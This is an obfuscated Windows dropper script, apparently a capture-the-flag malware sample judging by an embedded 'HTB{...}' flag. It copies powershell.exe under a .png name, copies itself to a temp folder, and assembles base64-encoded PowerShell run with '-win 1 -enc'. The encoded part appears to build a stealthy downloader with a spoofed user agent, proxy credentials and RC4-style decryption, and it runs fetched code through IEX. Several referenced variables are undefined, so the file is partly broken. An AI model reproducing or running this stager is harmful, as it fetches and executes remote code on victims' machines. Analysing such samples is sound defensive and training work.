#!/bin/bash

# Set environment variables
Rvsbpmhlmt="exit"
Txincqurfx="if not DEFINED IS_MI"
Zqcyqidklg="'min \"$0\" $* && '"
Onkhhdyhhb=NIMIZED
Mqiirtukji="IZED=1"
echo "start \"\" $Txincqurfx${Onkhhdyhhb}${Mqiirtukji}${Zqcyqidklg}${Rvsbpmhlmt}"

Tdoblhowds="erShell/v1.0/powersh"
Avvntausem="ell.exe $temp/Earttxmxaqr.png"
Ljyquixmun=/System32/WindowsPow
Ghgrymkrbp=xmxaqr.png
Anvakrxgse=" /y /h /i C:/Windows"
Vjhwyxllqy="echo F | xcopy /d /q"
Vjhwyxllqy${Anvakrxgse}${Ljyquixmun}${Tdoblhowds}${Avvntausem}${Ghgrymkrbp}

Ihhmxwdywx=" /y /h /i $0 $temp"
Dadpolxunf="echo F | xcopy /d /q"
Unscdsiwaa=Earttxmxaqr.png.bat
Dadpolxunf${Ihhmxwdywx}${Unscdsiwaa}

xkcscoxdxe="ACUAMgA1ADYAXQB9AH0A"
vjcwqonetf="AEMAbwB1AG4AdABdACkA"
rbqecbginc="ACQAaQB2AD0AJABkAGEA"
uuhyczmmxe="AC0AagBvAGkAbgBbAEMA"
inyahuzxoo="AGMAawBvACcAOwAkAHMA"
epijlrhjmq="YgA0AHQAXwBmADEAbAAz"
tnksxiibte="aQBjAGUAUABvAGkAbgB0"
yeitcnwdjv="TGBlAHQALgBXAGUAYgBD"
dfbbguetbi="LgBDAHIAZQBkAGUAbgB0"
dfbkfcybvd="AEoAXQAsACQAUwBbACQA"
wgyylpwodl="LgAuADIANQA1ADsAMAAu"
owdgfkrmmu="ZQBtAC4ATgBlAHQALgBX"
crjpoyymri="LgBQAHIAbwB4AHkAOwAk"
kkuvpmsxnx="NABTAHQAcgBpAG4AZwAo"
oxzuhafyty="XQA6ADoARQB4AHAAZQBj"
laamgfxxbt="AHMAYwA0AHQAMwBkAF8A"
kcijfzedak="AHQAJwAsACQAdQApADsA"
twtebvsaka="LQBPAGIAagBlAGMAdAAg"
rlfaegqlsg="aQBwAHQAOgBQAHIAbwB4"
nemzfezpoy="AC4AQQBkAGQAKAAnAFUA"
tekuivufxk="AFsAJABJAF0AOwAkAF8A"
nnhkxernpw="AGEAdABhAD0AJAB3AGMA"
zwqujbxyth="cgBvAGMAZQBzAHMALgBw"
rtkivjiqyi="dAAvADcALgAwADsAIABy"
qazgeuuryt="ACAAVAByAGkAZABlAG4A"
freecdurxu="OwAgAFcATwBXADYANAA7"
rbltgxozsy="AHsAJABJAD0AKAAkAEkA"
hxrxbmcrab="LQBiAHgAbwByACQAUwBb"
mtozbwhmdh="AC4AJABkAGEAdABhAC4A"
ggrgkijhev="AC4AMgA1ADUAfAAlAHsA"
zctzhvkube="AEsAPQBbAFMAeQBzAHQA"
slzbngdcxw="AGwAcwA7ACQAUwBjAHIA"
xrmnnquwgb="AE4AZQB0AC4AQwByAGUA"
iksmcfhnba="JAB3AGMALgBQAHIAbwB4"
pwojxvfdhy="AF0AKQAlADIANQA2ADsA"
cksjilhxsl="ACkAOwAkAFIAPQB7ACQA"
unuxwliqbr="AHIAcwBpAG8AbgAuAE0A"
ankyzawudo="JQAyADUANgA7ACQAUwBb"
jklvvznyoo="YgBsAGUALgBQAFMAVgBl"
mpmxufelmw="AHMAXwBjADQAbgBfAGIA"
ijtnxiydgk="IABsAGkAawBlACAARwBl"
livcnxklbi="AEEARABVAEEATQBnAEEA"
ywpjosgjdg="JABKAF0APQAkAFMAWwAk"
amedfzkpqa="AGkAYQBsAHMAIAA9ACAA"
fztuwvreiu="bABlAG4AZwB0AGgAXQA7"
cfsfpfaifn="AHkAPQBbAFMAeQBzAHQA"
talukgjglh="AGUAdAAuAFMAZQByAHYA"
gdxqtuxjtg="AG8AbQBCAGEAcwBlADYA"
udtkpvpwlh="dABlAHMAKAAnAGsAJQBO"
kkqqmvlfek="ACQAZgBsAGEAZwA9ACcA"
xynekerpsz="ACQASwApACkAfABJAEUA"
tgznzidgdc="ACQAXwBdACwAJABTAFsA"
xkbtgjgsbm="dABhAFsAMAAuAC4AMwBd"
dpbpdabswl="AGEAdQBsAHQAVwBlAGIA"
tkspqgfezg="ACQAdwBjAD0ATgBlAHcA"
xnsddewkjt="KABXAGkAbgBkAG8AdwBz"
vkxtpcsvkp="RAAsACQASwA9ACQAQQBy"
hkihdroftw="AGUAYgBSAGUAcQB1AGUA"
lwmpnyaakc="SABxAGYAZABvAH0ARgBa"
vbrffrcyuk="cwBlAHIALQBBAGcAZQBu"
qifiosnmwm="AFkAaQA3ACMAQwBQADUA"
cvxqumcgfs="eQBkAHIAegA9AEMAeABw"
zxavotsvle="AH0AJwA7ACQASAA9ACgA"
dfwfymvxpv="AH4ALQB7ACEAUQBVADEA"
pbervxlqvc="AFMAWwAkAF8AXQArACQA"
primtbeqjb="AGgAcAAnADsAJAB3AGMA"
hzdehetswc="OwAkAHcAYwAuAEgAZQBh"
hbqmigzuyd="AGwAbwBnAGkAbgAvAHAA"
ymqktainir="AGcAKABbAEMAbwBuAHYA"
akmeqpqplz="MABzAD0AIgApADsAJABk"
rhieovvavv="AG4AaQBjAG8AZABlAC4A"
frcuonrsae="AHIAcwBpAG8AbgBUAGEA"
adoosmqieq="AHQAMQAwADAAQwBvAG4A"
tpxihlfyyl="ADQAQQBEAE0AQQAnACkA"
hfvvkjkppw="KwAkAFMAWwAkAEgAXQAp"
btfeyoqgdd="KQApADsAJAB0AD0AJwAv"
tnjodalaim="AEsAcgBaAGMAdgBKADMA"
qwfhawtkpd="AGQAZQByAHMALgBBAGQA"
sfrjcuonvm="ACgAJABTAFsAJABJAF0A"
pixeueaexo="RwBlAHQAUwB0AHIAaQBu"
mtdhxnskxu="cwBlAHIAKwAkAHQAKQA7"
aktiwqjlij="AGUAdAB3AG8AcgBrAEMA"
yxqthvhhnc="AFcAZwBGADcAUQB1AGoA"
ooerzyphxp="AGwAYQAvADUALgAwACAA"
uvbsyaoahv="AGUAIgAsACIAawBwAFAA"
ztrqzcsghu="dQA9ACcATQBvAHoAaQBs"
prqqperknc="AGEAYcBoAGUAXQA6ADoA"
rrqelfomcx="QgBFAD0AegAuADkAbAAn"
zemewtnpgi="AFMAeQBzAHQAZQBtAC4A"
fwafmpmjol="JABTAFsAJABJAF0ALAAk"
xmbiatjqzd="cwB0AF0AOgA6AEQAZQBm"
gnvquaaikl="AE0AYQBuAGEAZwBlAHIA"
jucgtcyjlz="ZQBtAC4AVABlAHgAdAAu"
gchigjdpna="LgBEAG8AdwBuAGwAbwBh"
klymlpbwwk="YQBqAG8AcgAgAC0AZwBl"
iwnclvszmb="XwBdAH0AOwAkAEQAfAAl"
iqoqanaaht="AGcAcwA7ACQAUwA9ADAA"
dmzvddozpq="WwBTAHkAcwB0AGUAbQAu"
jbdzflrwit="JABKAD0AKAAkAEoAKwAk"
dympkboccz="RABjAEEATABnAEEAMwBB"
ncqfvygbex="SABUAEIAewAwAGIAZgB1"
pgssozxnkn="ng -win 1 -enc "
niyfborvvb="AFMAWwAkAEgAXQA9ACQA"
ifeszkpyma="ACAAJABSACAAJABkAGEA"
rbwcdidvor="ZwBdADoAOgBBAFMAQwBJ"
bvqepppuph="ZABlAG4AdABpAGEAbABD"
inghbxsuez=aABhAHIAWwBdAF0AKAAm
lhksbxgxno=ACcAYQBBAEIAMABBAEgA
jlzegvmqkh=dABpAG4AdQBlAD0AMAA7
bnimzrairh=AHgAdAAuAEUAbgBjAG8A
tirgstjpnp=UQBBAGMAQQBBADYAQQBD
vayhzkaoxh=AGQARABhAHQAYQAoACQA
rkqopnuhak=ZQByAD0AJAAoAFsAVABl
sbcgacqtjz=AEQAUQBBAEwAZwBBAHgA
mjugibbccj=NgBBAEQAZwBBAE0AQQBB
abfcbernie=ACAATgBUACAANgAuADEA
lrowavctaw=ZAAoACIAQwBvAG8AawBp
mxtypxhupc=JABIACsAJABTAFsAJABJ
eejhicejye=ADsAJABkAGEAdABhAD0A
mbruopeait=cgBlAGQAZQBuAHQAaQBh
dysfnbgmrs=ACAAMwApAHsAfQA7AFsA
llecwxirrv=SQBmACgAJABQAFMAVgBl
odqqbrqxgc=UwB5AHMAdABlAG0ALgBO


echo %Xtnpsjntki%%Uvpjcsfkps%%llecwxirrv%%ipvgcrqunf%%jklvvznyoo%%unuxwliqbr%%klymlpbwwk%%dysfnbgmrs%%odqqbrqxgc%%talukgjglh%%tnksxiibte%%gnvquaaikl%%oxzuhafyty%%adoosmqieq%%jlzegvmqkh%%tkspqgfezg%%twtebvsaka%%zemewtnpgi%%yeitcnwdjv%%talwelwshg%%ztrqzcsghu%%ooerzyphxp%%xnsddewkjt%%abfcbernie%%freecdurxu%%qazgeuuryt%%rtkivjiqyi%%nltfuhtqsp%%ijtnxiydgk%%inyahuzxoo%%rkqopnuhak%%bnimzrairh%%arirjwuufe%%peaqqqzjhx%%pixeueaexo%%ymqktainir%%groykdejaf%%gdxqtuxjtg%%kkuvpmsxnx%%lhksbxgxno%%tirgstjpnp%%gldgpaqmdi%%dympkboccz%%sbcgacqtjz%%vmoothwjeg%%livcnxklbi%%mjugibbccj%%tpxihlfyyl%%btfeyoqgdd%%hbqmigzuyd%%zwqujbxyth%%primtbeqjb%%yxtvktkqbj%%nemzfezpoy%%vbrffrcyuk%%kcijfzedak%%iksmcfhnba%%cfsfpfaifn%%owdgfkrmmu%%hkihdroftw%%xmbiatjqzd%%dpbpdabswl%%dwoqpodpsx%%iyxnbwqwvj%%dfbbguetbi%%amedfzkpqa%%dmzvddozpq%%xrmnnquwgb%%bvqepppuph%%prqqperknc%%dtbpjnfqte%%aktiwqjlij%%mbruopeait%%slzbngdcxw%%rlfaegqlsg%%gggylivaaj%%crjpoyymri%%zctzhvkube%%jucgtcyjlz%%xoezfsghqq%%rbwcdidvor%%eubxycigil%%udtkpvpwlh%%dfwfymvxpv%%lwmpnyaakc%%qifiosnmwm%%rrqelfomcx%%cksjilhxsl%%vkxtpcsvkp%%iqoqanaaht%%wgyylpwodl%%ggrgkijhev%%jbdzflrwit%%pbervxlqvc%%kfknsjurus%%vjcwqonetf%%ankyzawudo%%tgznzidgdc%%ywpjosgjdg%%dfbkfcybvd%%iwnclvszmb%%rbltgxozsy%%pgssozxnkn%%kkqqmvlfek%%ncqfvygbex%%laamgfxxbt%%epijlrhjmq%%mpmxufelmw%%ezwgclnoht%%zxavotsvle%%mxtypxhupc%%pwojxvfdhy%%fwafmpmjol%%niyfborvvb%%tajqgeimkk%%tekuivufxk%%hxrxbmcrab%%sfrjcuonvm%%hfvvkjkppw%%xkcscoxdxe%%hzdehetswc%%qwfhawtkpd%%lrowavctaw%%uvbsyaoahv%%cvxqumcgfs%%tnjodalaim%%frcuonrsae%%yxqthvhhnc%%akmeqpqplz%%nnhkxernpw%%gchigjdpna%%vayhzkaoxh%%mtdhxnskxu%%rbqecbginc%%xkbtgjgsbm%%eejhicejye%%ljwlrzenef%%mtozbwhmdh%%fztuwvreiu%%uuhyczmmxe%%inghbxsuez%%ifeszkpyma%%rhieovvavv%%xynekerpsz%%gwhtilbklu%